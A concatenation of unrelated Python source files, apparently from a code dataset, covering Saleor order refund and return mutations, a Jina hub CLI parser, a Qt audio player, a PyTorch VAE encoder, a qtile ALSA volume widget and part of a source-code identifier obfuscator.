if fulfillment.status != FulfillmentStatus.WAITING_FOR_APPROVAL:
raise ValidationError(
"Invalid fulfillment status, only WAITING_FOR_APPROVAL "
"fulfillments can be accepted.",
code=OrderErrorCode.INVALID.value,
)
if (
not info.context.site.settings.fulfillment_allow_unpaid
and not fulfillment.order.is_fully_paid()
):
raise ValidationError(
"Cannot fulfill unpaid order.",
code=OrderErrorCode.CANNOT_FULFILL_UNPAID_ORDER,
)
@classmethod
def perform_mutation(cls, _root, info, **data):
fulfillment = cls.get_node_or_error(info, data["id"], only_type="Fulfillment")
cls.clean_input(info, fulfillment)
order = fulfillment.order
fulfillment = approve_fulfillment(
fulfillment,
info.context.user,
info.context.app,
info.context.plugins,
notify_customer=data["notify_customer"],
)
order.refresh_from_db(fields=["status"])
return FulfillmentApprove(fulfillment=fulfillment, order=order)
class OrderRefundLineInput(graphene.InputObjectType):
order_line_id = graphene.ID(
description="The ID of the order line to refund.",
name="orderLineId",
required=True,
)
quantity = graphene.Int(
description="The number of items to be refunded.",
required=True,
)
class OrderRefundFulfillmentLineInput(graphene.InputObjectType):
fulfillment_line_id = graphene.ID(
description="The ID of the fulfillment line to refund.",
name="fulfillmentLineId",
required=True,
)
quantity = graphene.Int(
description="The number of items to be refunded.",
required=True,
)
class OrderRefundProductsInput(graphene.InputObjectType):
order_lines = graphene.List(
graphene.NonNull(OrderRefundLineInput),
description="List of unfulfilled lines to refund.",
)
fulfillment_lines = graphene.List(
graphene.NonNull(OrderRefundFulfillmentLineInput),
description="List of fulfilled lines to refund.",
)
amount_to_refund = PositiveDecimal(
required=False,
description="The total amount of refund when the value is provided manually.",
)
include_shipping_costs = graphene.Boolean(
        description=(
            "If true, Saleor will refund shipping costs. If amountToRefund is "
            "provided, includeShippingCosts will be ignored."
        ),
default_value=False,
)
class FulfillmentRefundAndReturnProductBase(BaseMutation):
class Meta:
abstract = True
@classmethod
def clean_order_payment(cls, payment, cleaned_input):
if not payment or not payment.can_refund():
raise ValidationError(
{
"order": ValidationError(
"Order cannot be refunded.",
code=OrderErrorCode.CANNOT_REFUND.value,
)
}
)
cleaned_input["payment"] = payment
@classmethod
def clean_amount_to_refund(cls, amount_to_refund, payment, cleaned_input):
if amount_to_refund is not None and amount_to_refund > payment.captured_amount:
raise ValidationError(
{
"amount_to_refund": ValidationError(
(
"The amountToRefund is greater than the maximal possible "
"amount to refund."
),
code=OrderErrorCode.CANNOT_REFUND.value,
),
}
)
cleaned_input["amount_to_refund"] = amount_to_refund
@classmethod
def _raise_error_for_line(cls, msg, type, line_id, field_name, code=None):
line_global_id = graphene.Node.to_global_id(type, line_id)
if not code:
code = OrderErrorCode.INVALID_QUANTITY.value
raise ValidationError(
{
field_name: ValidationError(
msg,
code=code,
params={field_name: line_global_id},
)
}
)
@classmethod
def clean_fulfillment_lines(
cls, fulfillment_lines_data, cleaned_input, whitelisted_statuses
):
fulfillment_lines = cls.get_nodes_or_error(
[line["fulfillment_line_id"] for line in fulfillment_lines_data],
field="fulfillment_lines",
only_type=FulfillmentLine,
qs=order_models.FulfillmentLine.objects.prefetch_related(
"fulfillment", "order_line"
),
)
fulfillment_lines = list(fulfillment_lines)
cleaned_fulfillment_lines = []
for line, line_data in zip(fulfillment_lines, fulfillment_lines_data):
quantity = line_data["quantity"]
if line.quantity < quantity:
cls._raise_error_for_line(
"Provided quantity is bigger than quantity from "
"fulfillment line",
"FulfillmentLine",
line.pk,
"fulfillment_line_id",
)
if line.fulfillment.status not in whitelisted_statuses:
allowed_statuses_str = ", ".join(whitelisted_statuses)
cls._raise_error_for_line(
f"Unable to process action for fulfillmentLine with different "
f"status than {allowed_statuses_str}.",
"FulfillmentLine",
line.pk,
"fulfillment_line_id",
code=OrderErrorCode.INVALID.value,
)
replace = line_data.get("replace", False)
if replace and not line.order_line.variant_id:
cls._raise_error_for_line(
"Unable to replace line as the assigned product doesn't exist.",
"OrderLine",
line.pk,
"order_line_id",
)
cleaned_fulfillment_lines.append(
FulfillmentLineData(
line=line,
quantity=quantity,
replace=replace,
)
)
cleaned_input["fulfillment_lines"] = cleaned_fulfillment_lines
@classmethod
def clean_lines(cls, lines_data, cleaned_input):
order_lines = cls.get_nodes_or_error(
[line["order_line_id"] for line in lines_data],
field="order_lines",
only_type=OrderLine,
qs=order_models.OrderLine.objects.prefetch_related(
"fulfillment_lines__fulfillment", "variant", "allocations"
),
)
order_lines = list(order_lines)
cleaned_order_lines = []
for line, line_data in zip(order_lines, lines_data):
quantity = line_data["quantity"]
if line.quantity < quantity:
cls._raise_error_for_line(
"Provided quantity is bigger than quantity from order line.",
"OrderLine",
line.pk,
"order_line_id",
)
quantity_ready_to_move = line.quantity_unfulfilled
if quantity_ready_to_move < quantity:
cls._raise_error_for_line(
"Provided quantity is bigger than unfulfilled quantity.",
"OrderLine",
line.pk,
"order_line_id",
)
replace = line_data.get("replace", False)
if replace and not line.variant_id:
cls._raise_error_for_line(
"Unable to replace line as the assigned product doesn't exist.",
"OrderLine",
line.pk,
"order_line_id",
)
cleaned_order_lines.append(
OrderLineData(line=line, quantity=quantity, replace=replace)
)
cleaned_input["order_lines"] = cleaned_order_lines
class FulfillmentRefundProducts(FulfillmentRefundAndReturnProductBase):
fulfillment = graphene.Field(Fulfillment, description="A refunded fulfillment.")
order = graphene.Field(Order, description="Order which fulfillment was refunded.")
class Arguments:
order = graphene.ID(
description="ID of the order to be refunded.", required=True
)
input = OrderRefundProductsInput(
required=True,
description="Fields required to create an refund fulfillment.",
)
class Meta:
description = "Refund products."
permissions = (OrderPermissions.MANAGE_ORDERS,)
error_type_class = OrderError
error_type_field = "order_errors"
@classmethod
def clean_input(cls, info, order_id, input):
cleaned_input = {}
amount_to_refund = input.get("amount_to_refund")
include_shipping_costs = input["include_shipping_costs"]
qs = order_models.Order.objects.prefetch_related("payments")
order = cls.get_node_or_error(
info, order_id, field="order", only_type=Order, qs=qs
)
payment = order.get_last_payment()
cls.clean_order_payment(payment, cleaned_input)
cls.clean_amount_to_refund(amount_to_refund, payment, cleaned_input)
cleaned_input.update(
{"include_shipping_costs": include_shipping_costs, "order": order}
)
order_lines_data = input.get("order_lines", [])
fulfillment_lines_data = input.get("fulfillment_lines", [])
if order_lines_data:
cls.clean_lines(order_lines_data, cleaned_input)
if fulfillment_lines_data:
cls.clean_fulfillment_lines(
fulfillment_lines_data,
cleaned_input,
whitelisted_statuses=[
FulfillmentStatus.FULFILLED,
FulfillmentStatus.RETURNED,
FulfillmentStatus.WAITING_FOR_APPROVAL,
],
)
return cleaned_input
@classmethod
def perform_mutation(cls, _root, info, **data):
cleaned_input = cls.clean_input(info, data.get("order"), data.get("input"))
order = cleaned_input["order"]
refund_fulfillment = create_refund_fulfillment(
info.context.user,
info.context.app,
order,
cleaned_input["payment"],
cleaned_input.get("order_lines", []),
cleaned_input.get("fulfillment_lines", []),
info.context.plugins,
cleaned_input["amount_to_refund"],
cleaned_input["include_shipping_costs"],
)
return cls(order=order, fulfillment=refund_fulfillment)
class OrderReturnLineInput(graphene.InputObjectType):
order_line_id = graphene.ID(
description="The ID of the order line to return.",
name="orderLineId",
required=True,
)
quantity = graphene.Int(
description="The number of items to be returned.",
required=True,
)
replace = graphene.Boolean(
description="Determines, if the line should be added to replace order.",
default_value=False,
)
class OrderReturnFulfillmentLineInput(graphene.InputObjectType):
fulfillment_line_id = graphene.ID(
description="The ID of the fulfillment line to return.",
name="fulfillmentLineId",
required=True,
)
quantity = graphene.Int(
description="The number of items to be returned.",
required=True,
)
replace = graphene.Boolean(
description="Determines, if the line should be added to replace order.",
default_value=False,
)
class OrderReturnProductsInput(graphene.InputObjectType):
order_lines = graphene.List(
graphene.NonNull(OrderReturnLineInput),
description="List of unfulfilled lines to return.",
)
fulfillment_lines = graphene.List(
graphene.NonNull(OrderReturnFulfillmentLineInput),
description="List of fulfilled lines to return.",
)
amount_to_refund = PositiveDecimal(
required=False,
description="The total amount of refund when the value is provided manually.",
)
include_shipping_costs = graphene.Boolean(
        description=(
            "If true, Saleor will refund shipping costs. If amountToRefund is "
            "provided, includeShippingCosts will be ignored."
        ),
default_value=False,
)
refund = graphene.Boolean(
description="If true, Saleor will call refund action for all lines.",
default_value=False,
)
class FulfillmentReturnProducts(FulfillmentRefundAndReturnProductBase):
return_fulfillment = graphene.Field(
Fulfillment, description="A return fulfillment."
)
replace_fulfillment = graphene.Field(
Fulfillment, description="A replace fulfillment."
)
order = graphene.Field(Order, description="Order which fulfillment was returned.")
replace_order = graphene.Field(
Order,
description="A draft order which was created for products with replace flag.",
)
class Meta:
description = "Return products."
permissions = (OrderPermissions.MANAGE_ORDERS,)
error_type_class = OrderError
error_type_field = "order_errors"
class Arguments:
order = graphene.ID(
description="ID of the order to be returned.", required=True
)
input = OrderReturnProductsInput(
required=True,
description="Fields required to return products.",
)
@classmethod
def clean_input(cls, info, order_id, input):
cleaned_input = {}
amount_to_refund = input.get("amount_to_refund")
include_shipping_costs = input["include_shipping_costs"]
refund = input["refund"]
qs = order_models.Order.objects.prefetch_related("payments")
order = cls.get_node_or_error(
info, order_id, field="order", only_type=Order, qs=qs
)
payment = order.get_last_payment()
if refund:
cls.clean_order_payment(payment, cleaned_input)
cls.clean_amount_to_refund(amount_to_refund, payment, cleaned_input)
cleaned_input.update(
{
"include_shipping_costs": include_shipping_costs,
"order": order,
"refund": refund,
}
)
order_lines_data = input.get("order_lines")
fulfillment_lines_data = input.get("fulfillment_lines")
if order_lines_data:
cls.clean_lines(order_lines_data, cleaned_input)
if fulfillment_lines_data:
cls.clean_fulfillment_lines(
fulfillment_lines_data,
cleaned_input,
whitelisted_statuses=[
FulfillmentStatus.FULFILLED,
FulfillmentStatus.REFUNDED,
FulfillmentStatus.WAITING_FOR_APPROVAL,
],
)
return cleaned_input
@classmethod
def perform_mutation(cls, _root, info, **data):
cleaned_input = cls.clean_input(info, data.get("order"), data.get("input"))
order = cleaned_input["order"]
response = create_fulfillments_for_returned_products(
info.context.user,
info.context.app,
order,
cleaned_input.get("payment"),
cleaned_input.get("order_lines", []),
cleaned_input.get("fulfillment_lines", []),
info.context.plugins,
cleaned_input["refund"],
cleaned_input.get("amount_to_refund"),
cleaned_input["include_shipping_costs"],
)
return_fulfillment, replace_fulfillment, replace_order = response
return cls(
order=order,
return_fulfillment=return_fulfillment,
replace_fulfillment=replace_fulfillment,
replace_order=replace_order,
)
|
the-stack_106_30633 | from ..base import set_base_parser
from ..helper import _chf
def set_hub_push_parser(parser=None):
"""Set the parser for the hub push
:param parser: an optional existing parser to build upon
:return: the parser
"""
if not parser:
parser = set_base_parser()
from .push import mixin_hub_push_parser
mixin_hub_push_parser(parser)
return parser
def set_hub_pull_parser(parser=None):
"""Set the parser for the hub pull
:param parser: an optional existing parser to build upon
:return: the parser
"""
if not parser:
parser = set_base_parser()
from .pull import mixin_hub_pull_parser
mixin_hub_pull_parser(parser)
return parser
def set_hub_parser(parser=None):
"""Set the parser for the hub
:param parser: the parser configure
"""
if not parser:
parser = set_base_parser()
spp = parser.add_subparsers(
dest='hub',
description='use `%(prog)-8s [sub-command] --help` '
'to get detailed information about each sub-command',
required=True,
)
set_hub_push_parser(
spp.add_parser(
'push',
help='push an executor package to the Jina hub',
description='Push an executor package to the Jina hub',
formatter_class=_chf,
)
)
set_hub_pull_parser(
spp.add_parser(
'pull',
help='download an executor package/image from the Jina hub',
description='Download an executor package/image from the Jina hub',
formatter_class=_chf,
)
)
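# Illustrative usage (not part of the original source): attach the hub sub-commands
# to an existing parser; the detailed push/pull arguments come from the mixins
# imported inside the helpers above.
#
#     parser = set_base_parser()
#     set_hub_parser(parser)
#     parser.print_help()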
|
the-stack_106_30634 |
from .imports import *
class AudioPlayer(QWidget):
def __init__(self, parent=None):
QWidget.__init__(self,parent)
layout = QHBoxLayout()
if AUDIO_ENABLED:
self.player = QMediaPlayer()
self.player.setNotifyInterval(10)
self.player.positionChanged.connect(self.checkEnd)
self.player.positionChanged.connect(self.positionChanged)
self.begin = -1 #in seconds
self.end = -1
self.duration = 0
self.slider = QSlider(Qt.Horizontal)
self.slider.setEnabled(False)
self.labelDuration = QLabel()
self.slider.sliderMoved.connect(self.seek)
layout.addWidget(self.slider)
layout.addWidget(self.labelDuration)
self.setupActions()
self.playbar = QToolBar()
self.playbar.addAction(self.playStopAction)
self.playbar.addAction(self.stopAction)
layout.addWidget(self.playbar, alignment=Qt.AlignHCenter)
self.setLayout(layout)
    def seek(self, milliseconds):
        # Seeking is currently disabled (the slider is not user-adjustable).
        return
        # self.player.setPosition(self.begin + milliseconds)
def playStopAudio(self):
if not AUDIO_ENABLED:
return
if self.player.mediaStatus() == QMediaPlayer.NoMedia:
return
if self.player.state() == QMediaPlayer.StoppedState:
self.play()
elif self.player.state() == QMediaPlayer.PausedState:
self.play()
elif self.player.state() == QMediaPlayer.PlayingState:
self.pause()
def setupActions(self):
self.playStopAction = QAction(self.style().standardIcon(QStyle.SP_MediaPlay), self.tr("Play"), self)
self.playStopAction.setShortcut(Qt.NoModifier + Qt.Key_Space)
self.playStopAction.setDisabled(False)
self.playStopAction.triggered.connect(self.playStopAudio)
        self.stopAction = QAction(self.style().standardIcon(QStyle.SP_MediaStop), self.tr("Stop"), self)
self.stopAction.setDisabled(False)
self.stopAction.triggered.connect(self.stop)
def setLimits(self,begin = -1, end = -1):
self.begin = begin * 1000
self.end = end * 1000
if self.end > 0:
self.duration = (self.end - self.begin)
else:
self.duration = self.player.duration()
print(self.duration)
self.slider.setRange(0, self.duration)
if not AUDIO_ENABLED:
return
if self.begin < 0:
self.player.setPosition(0)
else:
self.player.setPosition(self.begin)
def positionChanged(self, progress):
if not self.slider.isSliderDown():
self.slider.setValue(progress - self.begin)
self.updateDurationInfo(progress - self.begin)
def updateDurationInfo(self, currentInfo):
duration = self.duration
if currentInfo < 0:
currentInfo = 0
if currentInfo or duration:
            # QTime expects integer arguments; values here are in milliseconds.
            currentTime = QTime((currentInfo // 3600000) % 60, (currentInfo // 60000) % 60,
                                (currentInfo // 1000) % 60, currentInfo % 1000)
            totalTime = QTime((duration // 3600000) % 60, (duration // 60000) % 60,
                              (duration // 1000) % 60, duration % 1000)
            # duration is in milliseconds, so switch to the hour format above one hour
            format = 'hh:mm:ss.zzz' if duration > 3600000 else 'mm:ss.zzz'
tStr = currentTime.toString(format) + " / " + totalTime.toString(format)
else:
tStr = ""
self.labelDuration.setText(tStr)
def play(self):
if not AUDIO_ENABLED:
return
self.playStopAction.setIcon(
self.style().standardIcon(QStyle.SP_MediaPause))
if self.player.position() >= self.end or self.player.position() < self.begin:
self.player.setPosition(self.begin)
self.player.play()
def pause(self):
if not AUDIO_ENABLED:
return
self.playStopAction.setIcon(
self.style().standardIcon(QStyle.SP_MediaPlay))
self.player.pause()
def stop(self):
if not AUDIO_ENABLED:
return
self.playStopAction.setIcon(
self.style().standardIcon(QStyle.SP_MediaPlay))
self.player.stop()
def checkEnd(self, position):
if self.end > self.begin and position >= self.end:
self.stop()
def setAudioFile(self, path):
if not AUDIO_ENABLED:
return
self.path = path
url = QUrl.fromLocalFile(path)
self.player.setMedia(QMediaContent(url))
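# Illustrative usage inside a running Qt application (not part of the original
# source; the file path is a placeholder and audio support must be enabled):
#
#     player = AudioPlayer()
#     player.setAudioFile('/path/to/audio.wav')
#     player.setLimits(begin=1.5, end=3.0)   # seconds; playback stops at `end`
#     player.playStopAudio()                 # toggles between play and pause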
|
the-stack_106_30635 | """
VAE encoder + Classifier
"""
import torch
from torch import nn
import torch.nn.init as init
class View(nn.Module):
def __init__(self, size):
super(View, self).__init__()
self.size = size
def forward(self, tensor):
return tensor.view(self.size)
class Encoder(nn.Module):
def __init__(self, z_dim=32, nc=3):
super(Encoder, self).__init__()
s2 = 14
self.encoder = nn.Sequential(
nn.Conv2d(nc, 128, 4, 2, 1, bias=False), # B, 128, 32, 32
nn.BatchNorm2d(128),
nn.ReLU(True),
nn.Conv2d(128, 256, 4, 2, 1, bias=False), # B, 256, 16, 16
nn.BatchNorm2d(256),
nn.ReLU(True),
nn.Conv2d(256, 512, 4, 2, 1, bias=False), # B, 512, 8, 8
nn.BatchNorm2d(512),
nn.ReLU(True),
nn.Conv2d(512, 1024, 4, 2, 1, bias=False), # B, 1024, 4, 4
nn.BatchNorm2d(1024),
nn.ReLU(True),
View((-1, 1024*s2*s2)), # B, 1024*4*4
)
self.fc_mu = nn.Linear(1024*s2*s2, z_dim) # B, z_dim
self.fc_logvar = nn.Linear(1024*s2*s2, z_dim) # B, z_dim
def weight_init(self):
for block in self._modules:
try:
for m in self._modules[block]:
kaiming_init(m)
except:
kaiming_init(block)
def forward(self, x):
z = self._encode(x)
# print("debug, z.shape ", z.shape)
mu, logvar = self.fc_mu(z), self.fc_logvar(z)
return z, mu, logvar
# print("mu.shape ...", mu.shape, logvar.shape)
# z = self.reparameterize(mu, logvar)
# x_recon = self._decode(z)
#
# return x_recon, z, mu, logvar
def reparameterize(self, mu, logvar):
stds = (0.5 * logvar).exp()
epsilon = torch.randn(*mu.size())
if mu.is_cuda:
stds, epsilon = stds.cuda(), epsilon.cuda()
latents = epsilon * stds + mu
return latents
def _encode(self, x):
return self.encoder(x)
# def _decode(self, z):
# return self.decoder(z)
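# Shape note for the encoder above (descriptive comment, not from the original
# source): the inline "B, 128, 32, 32" style comments assume a 64x64 input, but
# s2 = 14 corresponds to a 224x224 input, since four stride-2 convolutions map
# 224 -> 112 -> 56 -> 28 -> 14 before the 1024*14*14 flatten feeding fc_mu/fc_logvar.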
class Discriminator(nn.Module):
"""Adversary architecture(Discriminator) for WAE-GAN."""
def __init__(self, z_dim=32):
super(Discriminator, self).__init__()
self.z_dim = z_dim
self.net = nn.Sequential(
nn.Linear(z_dim, 512),
nn.ReLU(True),
nn.Linear(512, 512),
nn.ReLU(True),
nn.Linear(512, 1),
nn.Sigmoid()
)
self.weight_init()
def weight_init(self):
for block in self._modules:
for m in self._modules[block]:
kaiming_init(m)
def forward(self, z):
return self.net(z)
def kaiming_init(m):
if isinstance(m, (nn.Linear, nn.Conv2d)):
        init.kaiming_normal_(m.weight)  # in-place variant; `kaiming_normal` is removed in newer PyTorch
if m.bias is not None:
m.bias.data.fill_(0)
elif isinstance(m, (nn.BatchNorm1d, nn.BatchNorm2d)):
m.weight.data.fill_(1)
if m.bias is not None:
m.bias.data.fill_(0)
|
the-stack_106_30637 | import re
import shutil
import subprocess
from libqtile import bar, confreader, images
from libqtile.log_utils import logger
from libqtile.widget import base
RE_VOL = re.compile(r"Playback\s[0-9]+\s\[([0-9]+)%\]\s\[(on|off)\]")
class ALSAWidget(base._Widget, base.PaddingMixin, base.MarginMixin):
"""
The widget is very simple and, so far, just allows controls for
volume up, down and mute.
Volume control is handled by running the appropriate amixer command.
The widget is updated instantly when volume is changed via this
code, but will also update on an interval (i.e. it will reflect
changes to volume made by other programs).
The widget displays volume level via an icon, bar or both. The icon
is permanently visible while the bar only displays when the volume
is changed and will hide after a user-defined period.
"""
orientations = base.ORIENTATION_HORIZONTAL
defaults = [
("font", "sans", "Default font"),
("fontsize", None, "Font size"),
("foreground", "ffffff", "Font colour"),
("mode", "bar", "Display mode: 'icon', 'bar', 'both'."),
("hide_interval", 5, "Timeout before bar is hidden after update"),
("text_format", "{volume}%", "String format"),
("bar_width", 75, "Width of display bar"),
("bar_colour_normal", "009900", "Colour of bar in normal range"),
("bar_colour_high", "999900", "Colour of bar if high range"),
("bar_colour_loud", "990000", "Colour of bar in loud range"),
("bar_colour_mute", "999999", "Colour of bar if muted"),
("limit_normal", 70, "Max percentage for normal range"),
("limit_high", 90, "Max percentage for high range"),
("limit_loud", 100, "Max percentage for loud range"),
("update_interval", 5, "Interval to update widget (e.g. if changes made in other apps)."),
("theme_path", None, "Path to theme icons."),
("step", 5, "Amount to increase volume by"),
("device", "Master", "Name of ALSA device"),
]
_screenshots = [
("volumecontrol-icon.gif", "'icon' mode"),
("volumecontrol-bar.gif", "'bar' mode"),
("volumecontrol-both.gif", "'both' mode"),
]
icon_map = []
def __init__(self, **config):
base._Widget.__init__(self, bar.CALCULATED, **config)
self.add_defaults(ALSAWidget.defaults)
self.add_defaults(base.PaddingMixin.defaults)
self.add_defaults(base.MarginMixin.defaults)
self.add_callbacks(
{
"Button1": self.cmd_toggle_mute,
"Button4": self.cmd_volume_up,
"Button5": self.cmd_volume_down,
}
)
# Set up necessary variables
self.muted = False
self.volume = -1
self.oldvol = -1
self.oldmute = False
# Variable to store icons
self.surfaces = {}
# Work out what we need to display
self.show_bar = self.mode in ["bar", "both"]
self.show_icon = self.mode in ["icon", "both"]
# Define some variables to prevent early errors
self.iconsize = 0
self.text_width = 0
# Variables for the timers we need
self.update_timer = None
self.hide_timer = None
        # Start off with the bar hidden
self.hidden = True
# Map bar colours for volume level
self.colours = [
(self.limit_normal, self.bar_colour_normal),
(self.limit_high, self.bar_colour_high),
(self.limit_loud, self.bar_colour_loud),
]
def _configure(self, qtile, bar):
base._Widget._configure(self, qtile, bar)
self.get_volume()
if self.mode in ["icon", "both"] and not self.theme_path:
logger.error("You must set the `theme_path` when using icons")
raise confreader.ConfigError("No theme_path provided.")
if self.show_icon:
try:
self.setup_images()
except images.LoadingError:
logger.error(f"Could not find volume icons at {self.theme_path}.")
raise confreader.ConfigError("Volume icons not found.")
# Minimum size needed to display text
self.text_width = self.max_text_width()
# Bar size is bigger of needed space and user-defined size
self.bar_size = max(self.text_width, self.bar_width)
# Start the refresh timer (to check if volume changed elsewhere)
self.set_refresh_timer()
def max_text_width(self):
# Calculate max width of text given defined layout
txt_width, _ = self.drawer.max_layout_size(
[self.text_format.format(volume=100)], self.font, self.fontsize
)
return txt_width
def calculate_length(self):
# Size depends on what's being shown
# Start with zero width and add to it
width = 0
# Showing icons?
if self.show_icon:
width += self.iconsize
# Showing bar?
if self.show_bar and not self.hidden:
width += self.bar_size
return width
def status_change(self, vol, muted):
# Something's changed so let's update display
# Unhide bar
self.hidden = False
# Get new values
self.volume = vol
self.muted = muted
# Restart timer
self.set_refresh_timer()
# If we're showing the bar then set timer to hide it
if self.show_bar:
self.set_hide_timer()
# Draw
self.bar.draw()
def setup_images(self):
# Load icons
names = (
"audio-volume-muted",
"audio-volume-low",
"audio-volume-medium",
"audio-volume-high",
)
d_images = images.Loader(self.theme_path)(*names)
for name, img in d_images.items():
new_height = self.bar.height - 1
img.resize(height=new_height)
self.iconsize = img.width
self.surfaces[name] = img.pattern
def draw(self):
# Define an offset for x placement
x_offset = 0
# Clear the widget
self.drawer.clear(self.background or self.bar.background)
# Which icon do we need?
if self.show_icon:
if self.muted or self.volume == 0:
img_name = "audio-volume-muted"
elif self.volume <= 35:
img_name = "audio-volume-low"
elif self.volume <= 70:
img_name = "audio-volume-medium"
else:
img_name = "audio-volume-high"
# Draw icon
self.drawer.ctx.set_source(self.surfaces[img_name])
self.drawer.ctx.paint()
# Increase offset
x_offset += self.iconsize
# Does bar need to be displayed
if self.show_bar and not self.hidden:
# Text and colour depends on mute status and volume level
if not self.muted:
text = self.text_format.format(volume=self.volume)
fill = next(x[1] for x in self.colours if self.volume <= x[0])
else:
text = "X"
fill = self.bar_colour_mute
# Set bar colours
self.drawer.set_source_rgb(fill)
# Draw the bar
self.drawer.fillrect(x_offset, 0, self.bar_size * (self.volume / 100), self.height, 1)
# Create a text box
layout = self.drawer.textlayout(
text, self.foreground, self.font, self.fontsize, None, wrap=False
)
# We want to centre this vertically
y_offset = (self.bar.height - layout.height) / 2
# Set the layout as wide as the widget so text is centred
layout.width = self.bar_size
# Add the text to our drawer
layout.draw(x_offset, y_offset)
self.drawer.draw(offsetx=self.offset, offsety=self.offsety, width=self.length)
def refresh(self):
# Check the volume levels to see if they've changed
# Callback will be triggered if they have
self.get_volume()
# Restart timer
self.set_refresh_timer()
def set_refresh_timer(self):
# Delete old timer
if self.update_timer:
self.update_timer.cancel()
# Start new timer
self.update_timer = self.timeout_add(self.update_interval, self.refresh)
def set_hide_timer(self):
# Cancel old timer
if self.hide_timer:
self.hide_timer.cancel()
# Set new timer
self.hide_timer = self.timeout_add(self.hide_interval, self.hide)
def hide(self):
# Hide the widget
self.hidden = True
self.bar.draw()
def _run(self, cmd):
if not shutil.which("amixer"):
logger.warning("'amixer' is not installed. Unable to set volume.")
return
# Run the amixer command and use regex to capture volume line
proc = subprocess.run(cmd.split(), capture_output=True)
matched = RE_VOL.search(proc.stdout.decode())
# If we find a match, extract volume and mute status
if matched:
self.volume = int(matched.groups()[0])
self.muted = matched.groups()[1] == "off"
# If volume or mute status has changed
# then we need to trigger callback
if any([self.volume != self.oldvol, self.muted != self.oldmute]):
self.status_change(self.volume, self.muted)
# Record old values
self.oldvol = self.volume
self.oldmute = self.muted
def get_volume(self):
cmd = "amixer get {}".format(self.device)
self._run(cmd)
def cmd_volume_up(self, *args, **kwargs):
"""Increase volume"""
cmd = "amixer set {} {}%+".format(self.device, self.step)
self._run(cmd)
def cmd_volume_down(self, *args, **kwargs):
"""Decrease volume"""
cmd = "amixer set {} {}%-".format(self.device, self.step)
self._run(cmd)
def cmd_toggle_mute(self, *args, **kwargs):
"""Mute audio output"""
cmd = "amixer set {} toggle".format(self.device)
self._run(cmd)
def info(self):
info = base._Widget.info(self)
info["volume"] = self.volume
info["muted"] = self.muted
return info
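# Illustrative qtile config snippet for the widget above (not part of the original
# source; the import path and theme_path are placeholders):
#
#     from libqtile import bar
#     from libqtile.config import Screen
#
#     screens = [
#         Screen(top=bar.Bar([
#             ALSAWidget(mode="both",
#                        theme_path="/usr/share/icons/Paper/24x24/panel/",
#                        step=2, device="Master"),
#         ], 28)),
#     ]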
|
the-stack_106_30638 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__doc__ = """\
A collection of functions for obfuscating code.
"""
import os
import sys
import tokenize
import keyword
import unicodedata
from random import shuffle, choice
from itertools import permutations
# Import our own modules
from . import analyze
from . import token_utils
# sys.version_info is a tuple subclass in Python 3, so check the major version directly
if sys.version_info[0] == 3:
    unichr = chr  # So we can support both 2 and 3
try:
unichr(0x10000) # Will throw a ValueError on narrow Python builds
HIGHEST_UNICODE = 0x10FFFF # 1114111
except:
HIGHEST_UNICODE = 0xFFFF # 65535
# Reserved words can be overridden by the script that imports this module
RESERVED_WORDS = keyword.kwlist + analyze.builtins
VAR_REPLACEMENTS = {} # So we can reference what's already been replaced
FUNC_REPLACEMENTS = {}
CLASS_REPLACEMENTS = {}
UNIQUE_REPLACEMENTS = {}
def obfuscation_machine(use_unicode=False, identifier_length=1):
"""
A generator that returns short sequential combinations of lower and
upper-case letters that will never repeat.
If *use_unicode* is ``True``, use nonlatin cryllic, arabic, and syriac
letters instead of the usual ABCs.
The *identifier_length* represents the length of the string to return using
the aforementioned characters.
"""
# This generates a list of the letters a-z:
lowercase = list(map(chr, range(97, 123)))
# Same thing but ALL CAPS:
uppercase = list(map(chr, range(65, 90)))
if use_unicode:
# Python 3 lets us have some *real* fun:
allowed_categories = ('LC', 'Ll', 'Lu', 'Lo', 'Lu')
# All the fun characters start at 1580 (hehe):
big_list = list(map(chr, range(1580, HIGHEST_UNICODE)))
max_chars = 1000 # Ought to be enough for anybody :)
combined = []
rtl_categories = ('AL', 'R') # AL == Arabic, R == Any right-to-left
last_orientation = 'L' # L = Any left-to-right
# Find a good mix of left-to-right and right-to-left characters
while len(combined) < max_chars:
char = choice(big_list)
if unicodedata.category(char) in allowed_categories:
orientation = unicodedata.bidirectional(char)
if last_orientation in rtl_categories:
if orientation not in rtl_categories:
combined.append(char)
else:
if orientation in rtl_categories:
combined.append(char)
last_orientation = orientation
else:
combined = lowercase + uppercase
shuffle(combined) # Randomize it all to keep things interesting
while True:
for perm in permutations(combined, identifier_length):
perm = "".join(perm)
if perm not in RESERVED_WORDS: # Can't replace reserved words
yield perm
identifier_length += 1
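# Illustrative usage of the generator above (not part of the original source):
#
#     name_gen = obfuscation_machine(identifier_length=1)
#     next(name_gen)   # a random single letter, e.g. 'q'
#     next(name_gen)   # another identifier; names never repeat and grow longer
#                      # once all combinations of the current length are used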
def apply_obfuscation(source):
"""
Returns 'source' all obfuscated.
"""
global keyword_args
global imported_modules
tokens = token_utils.listified_tokenizer(source)
keyword_args = analyze.enumerate_keyword_args(tokens)
imported_modules = analyze.enumerate_imports(tokens)
variables = find_obfuscatables(tokens, obfuscatable_variable)
classes = find_obfuscatables(tokens, obfuscatable_class)
functions = find_obfuscatables(tokens, obfuscatable_function)
for variable in variables:
replace_obfuscatables(
tokens, obfuscate_variable, variable, name_generator)
for function in functions:
replace_obfuscatables(
tokens, obfuscate_function, function, name_generator)
for _class in classes:
replace_obfuscatables(tokens, obfuscate_class, _class, name_generator)
return token_utils.untokenize(tokens)
def find_obfuscatables(tokens, obfunc, ignore_length=False):
"""
Iterates over *tokens*, which must be an equivalent output to what
tokenize.generate_tokens() produces, calling *obfunc* on each with the
following parameters:
- **tokens:** The current list of tokens.
- **index:** The current position in the list.
*obfunc* is expected to return the token string if that token can be safely
obfuscated **or** one of the following optional values which will instruct
find_obfuscatables() how to proceed:
- **'__skipline__'** Keep skipping tokens until a newline is reached.
- **'__skipnext__'** Skip the next token in the sequence.
If *ignore_length* is ``True`` then single-character obfuscatables will
be obfuscated anyway (even though it wouldn't save any space).
"""
global keyword_args
keyword_args = analyze.enumerate_keyword_args(tokens)
global imported_modules
imported_modules = analyze.enumerate_imports(tokens)
#print("imported_modules: %s" % imported_modules)
skip_line = False
skip_next = False
obfuscatables = []
for index, tok in enumerate(tokens):
token_type = tok[0]
if token_type == tokenize.NEWLINE:
skip_line = False
if skip_line:
continue
result = obfunc(tokens, index, ignore_length=ignore_length)
if result:
if skip_next:
skip_next = False
elif result == '__skipline__':
skip_line = True
elif result == '__skipnext__':
skip_next = True
